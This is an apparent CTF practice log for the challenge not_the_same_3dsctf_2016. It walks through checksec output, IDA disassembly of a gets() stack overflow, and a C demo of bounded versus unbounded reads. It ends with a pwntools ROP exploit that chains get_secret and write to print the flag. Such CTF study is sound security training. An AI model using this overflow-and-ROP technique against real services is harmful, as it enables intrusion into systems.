BUUOJ pwn practice log (continuously updated)

Stack & ROP

TODO....

not_the_same_3dsctf_2016

checksec

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

Open the binary in IDA and locate main:

.text:080489E0             ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:080489E0 public main
.text:080489E0 main proc near ; DATA XREF: _start+17↑o
.text:080489E0
.text:080489E0 var_3C = dword ptr -3Ch
.text:080489E0 var_2D = byte ptr -2Dh
.text:080489E0 argc = dword ptr 4
.text:080489E0 argv = dword ptr 8
.text:080489E0 envp = dword ptr 0Ch
.text:080489E0
.text:080489E0 83 EC 3C sub esp, 3Ch
.text:080489E3 C7 04 24 B1+ mov [esp+3Ch+var_3C], offset aB0r4V3rS37u4hO ; "b0r4 v3r s3 7u 4h o b1ch4o m3m0... "
.text:080489E3 C2 0B 08
.text:080489EA E8 B1 66 00+ call printf
.text:080489EA 00
.text:080489EF 8D 44 24 0F lea eax, [esp+3Ch+var_2D]
.text:080489F3 89 04 24 mov [esp+3Ch+var_3C], eax
.text:080489F6 E8 D5 6E 00+ call gets
.text:080489F6 00
.text:080489FB 31 C0 xor eax, eax
.text:080489FD 83 C4 3C add esp, 3Ch
.text:08048A00 C3 retn
.text:08048A00 main endp

The program logic is simple: user input is read into var_2D, and since gets has no length limit, this is a stack overflow. The next step is to use the overflow to return into an arbitrary function. Looking through the binary we find a get_secret function that reads flag.txt; it was obviously placed there by the challenge author on purpose. However, get_secret does not print the contents of flag.txt to stdout, so we have to call write ourselves to output it.
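The root cause, as an added example rather than the challenge's own source: the main shown above is reconstructed in C from the disassembly, where gets() fills a 0x2D-byte buffer (0x3C - 0xF) whose end sits directly beneath the return address. The block contrasts an unbounded gets-style reader with a bounded fgets-style one; both take a FILE* so a constructed input line can be replayed through fmemopen() offline. The guard word standing in for the saved return address and the all-'A' input lines are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x2D   /* var_2D in the frame above: 0x3C - 0xF bytes */

/* Mirrors what gets() does: copies bytes up to '\n'/EOF with no bound.
 * Returns the number of bytes stored (excluding the NUL).  The caller has
 * to guarantee dst is big enough, and that guarantee is exactly what the
 * challenge binary lacks. */
size_t read_line_unbounded(char *dst, FILE *in) {
    size_t n = 0;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        dst[n++] = (char)c;
    dst[n] = '\0';
    return n;
}

/* Bounded replacement in the style of fgets(): stores at most cap - 1 bytes
 * plus the NUL and discards the rest of the line.  Returns bytes stored. */
size_t read_line_bounded(char *dst, size_t cap, FILE *in) {
    size_t n = 0;
    int c;
    if (cap == 0) return 0;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (n < cap - 1)
            dst[n++] = (char)c;
        /* else: input longer than the buffer, byte is dropped */
    }
    dst[n] = '\0';
    return n;
}

/* Constructed input: n bytes of 'A' followed by a newline (n < 4000). */
const char *constructed_line(size_t n) {
    static char line[4096];
    memset(line, 'A', n);
    line[n] = '\n';
    line[n + 1] = '\0';
    return line;
}

/* Returns 1 if an unbounded read of `line` would write past a BUF_SIZE
 * buffer (n bytes + NUL > BUF_SIZE), i.e. reach the return address.
 * The read itself goes into an oversized scratch area so the demo stays
 * well-defined. */
int overflows_buf(const char *line) {
    char scratch[4096];
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (!in) return -1;
    size_t n = read_line_unbounded(scratch, in);
    fclose(in);
    return n >= BUF_SIZE;
}

/* Reads `line` with the bounded reader into a BUF_SIZE buffer followed by a
 * guard word (constructed stand-in for the saved return address).  Returns
 * the number of bytes stored if the guard is intact, -1 if it was clobbered. */
int bounded_read_stored_length(const char *line) {
    const unsigned int GUARD = 0x41424344u;
    struct { char buf[BUF_SIZE]; unsigned int guard; } frame;
    frame.guard = GUARD;
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (!in) return -1;
    size_t n = read_line_bounded(frame.buf, sizeof frame.buf, in);
    fclose(in);
    return frame.guard == GUARD ? (int)n : -1;
}

int main(void) {
    printf("0x2C bytes reach return address: %d\n", overflows_buf(constructed_line(0x2C)));
    printf("0x2D bytes reach return address: %d\n", overflows_buf(constructed_line(0x2D)));
    printf("bounded read stored %d of 200 bytes\n",
           bounded_read_stored_length(constructed_line(200)));
    return 0;
}
```

The 0x2D threshold in overflows_buf is the same number the exploit below uses as padding: the first byte past the buffer is the low byte of main's return address, and with no canary and no saved ebp in this frame there is nothing in between.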

from pwn import *
import sys


def main():
    context.log_level = 'debug'
    context.arch = 'i386'
    context.bits = 32

    if len(sys.argv) == 3:
        p = remote(sys.argv[1], int(sys.argv[2]))
    else:
        p = process('./not_the_same_3dsctf_2016')
        gdb.attach(p, 'b get_secret')
    elf = ELF('./not_the_same_3dsctf_2016')

    get_secret_addr = 0x080489A0       # reads flag.txt into memory
    write_addr = elf.sym['write']      # binary is static, write is in the ELF
    flag_addr = 0x080ECA2D             # buffer get_secret fills

    # 0x2D bytes from var_2D to the return address (no saved ebp in this frame).
    # main returns into get_secret; get_secret returns into write, whose
    # return slot is followed by its cdecl args: write(1, flag_addr, 42).
    payload = b'a' * 0x2d + p32(get_secret_addr) + \
        p32(write_addr) + p32(flag_addr) + p32(1) + \
        p32(flag_addr) + p32(42)

    p.sendline(payload)
    p.interactive()


if __name__ == '__main__':
    main()

Heap